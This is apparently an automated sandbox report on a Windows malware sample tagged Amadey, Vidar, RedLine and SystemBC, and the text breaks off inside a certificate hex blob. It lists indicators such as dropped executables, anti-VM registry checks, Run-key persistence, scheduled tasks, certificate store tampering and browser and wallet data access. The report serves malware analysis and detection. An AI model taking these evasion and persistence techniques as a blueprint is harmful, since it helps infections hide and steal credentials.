Malware Analysis Report

2025-04-03 09:23

Sample ID: 250305-eqsh1sym12
Target: fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe
SHA256: fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7
Tags: amadey svcstealer systembc vidar 092155 ir7am defense_evasion discovery downloader execution persistence spyware stealer trojan redline testproliv credential_access infostealer pyinstaller upx
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7
Threat Level: Known bad

The file fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe was found to be: Known bad.

Malicious Activity Summary


RedLine

Redline family

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Vidar family

Detects SvcStealer Payload

Detect Vidar Stealer

SystemBC

Vidar

Svcstealer family

SvcStealer, Diamotrix

Amadey family

Systembc family

RedLine payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Uses browser remote debugging

Reads user/profile data of web browsers

.NET Reactor protector

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of local email clients

Identifies Wine through registry keys

Loads dropped DLL

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

AutoIT Executable

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious use of UnmapMainImage

Checks processor information in registry

Suspicious behavior: MapViewOfSection

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2025-03-05 04:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2025-03-05 04:09
Reported: 2025-03-05 04:11
Platform: win7-20250207-en
Max time kernel: 149s
Max time network: 150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1548 created 1180 N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe C:\Windows\Explorer.EXE

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\wwasfxe\orhct.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\wwasfxe\orhct.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\wwasfxe\orhct.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe N/A
N/A N/A C:\ProgramData\wwasfxe\orhct.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\ProgramData\wwasfxe\orhct.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\baabdababbec = "\"C:\\ProgramData\\baabdababbec.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\faeba77a20.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\faeba77a20.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1932 set thread context of 1264 N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\futors.job C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\wwasfxe\orhct.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{32C5EE92-B34F-4325-908A-F28FC29E7323}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{12D41D20-D467-4E85-9CBC-5B2CF86FB2AE}\.ba\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [blob omitted] C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob omitted] C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob omitted] C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [blob omitted] C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9e